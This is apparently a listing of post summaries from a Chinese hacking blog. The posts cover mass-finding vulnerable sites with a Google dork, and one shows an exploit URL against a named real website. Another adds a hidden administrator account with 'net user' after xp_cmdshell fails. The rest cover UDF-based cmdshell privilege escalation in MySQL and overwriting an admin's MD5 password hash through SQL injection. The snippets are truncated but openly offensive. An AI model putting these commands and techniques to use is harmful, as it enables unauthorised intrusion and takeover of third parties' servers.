摘要:
使用方法: 谷歌批量搜索 关键字:inurl:yp/product.php exp代码: product.php?}} 找取一个网站:www.slsdgc.com.cn/yp/product.php?catid=721 exp利用方法:www.slsdgc.com.cn/yp/product.php 阅读全文
该文被密码保护。 阅读全文
摘要:
net user SQLDebugger list /addnet localgroup administrators SQLDebugger /add Error Message:未能找到存储过程 'master..xp_cmdshell'。 修复法:很通用的,其实碰到 其他126 127的都可以 阅读全文
摘要:
今儿遇见一个站,支持aspx,但是不定全满,找不到SA,逼迫使用udf提权,但是提权过程里面遇见了一些问题可以导出 然后就去执行神马create function cmdshell returns string soname 'c:\windows\udf.dll'可是悲剧就来了请检查SQL语句Cr 阅读全文
摘要:
on error resume next const HKEY_LOCAL_MACHINE = &H80000002 strComputer = "." Set StdOut = WScript.StdOut Set oReg=GetObject("winmgmts:{impersonationLe 阅读全文
摘要:
经常拿站的黑阔们一定经常碰到,某个网站有注入点,管理员帐号和密码多暴出来了。 可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL) 测试如下: http://www.xxxxxx.com/news.asp?id=121 阅读全文